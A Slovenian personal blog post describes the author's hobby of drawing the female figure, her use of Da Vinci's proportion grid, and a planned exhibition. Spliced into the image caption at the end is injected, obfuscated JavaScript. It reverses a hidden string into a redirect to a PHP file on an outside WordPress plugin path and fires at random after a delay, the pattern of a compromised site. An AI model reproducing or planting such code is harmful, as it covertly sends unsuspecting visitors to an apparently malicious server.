Risanje ženske

Že od male deklice zelo rada rišem in sem, bi rekla, tudi precej dobra v tem. Moja tematika so vedno bile ženske, to je tisto, kar najbolje narišem in v tem res uživam.

V vrtcu so te ženske bile punčke, pinceske. Znala sem jih narisati zelo lepo, z razkošnimi oblekicami in frizuro. Včasih sem poskusila zraven narisati še ozadje ali pa kakšno žival, na primer konja, a mi po navadi ni uspelo. Zato sem večinoma ostala le na punčkah.

Kasneje skozi leta ustvarjanja sem risala razne kreacije, na primer drese za rock’n’roll ali gimnastiko, ker sem to tudi trenirala in so mi bili te dresi od nekdaj všeč. Rada sem jih risala v različnih položajih med plesom in v raznih oblikah in barvah. Med tem pa se je tudi moja tehnika bolj izpopolnila. Ko sem nehala trenirati, sem počasi tudi nehala ustvarjati risbe z dresi. Zato pa so na vrsto prišle razne kreacije vsakdanjih oblačil. Zabavala sem se z različnimi modeli hlač in kril, jaknami, klobuki,.. skratka vsemi deli oblačil, katerim so seveda sledili tudi modni dodatki in frizura. V tistem času so se začele prodajati tudi nekakšne pobarvanke, kjer si že imel narisano postavo, ti pa si ji samo dodal oblačilo. Sama nisem nikoli imela teh pobarvank, sem pa jih vedno prerisovala od drugih in jim dodala obleke. S temi pobarvankami se je rahlo porazgubil moj slog risanja in še danes ga gradim nazaj.

Le, da danes redko kdaj rišem obleke. Po navadi rišem le žensko postavo, poskusim uporabiti čim več različnih položajev telesa in se s tem učiti tehnike. Z vsako sliko se naučim nekaj novega. Proporce, prste, oblike,…

Zabavno mi je bilo, ko sem se igrala z Da Vincijevo idejo o človeškem telesu. Učila sem se telo narisati v razne like, od katerih mi je bil najbolj pri srcu pravokotnik, razdeljen na pet enako velikih manjših pravokotnikov. S tem načinom sem ugotovila natančno postavitev posameznih delov telesa in ga uporabljam še danes.

Risanje ženskega telesa je moj najljubši hobi. Zato sem se tudi odločila za kolekcijo Življenje ženske, v katerem bom združila različne položaje s situacijami in občutki, v katerih se znajdemo. Kolekcija se pripravlja za razstavo v juliju 2019, česar se zelo veselim. Seveda pa je do takrat še ogromno časa, zato mi lahko pomagate z idejami.

Z Ljubeznijo;
(Ni)Si

 

Prikazana slika:  $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/leonardo-da-vinci?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash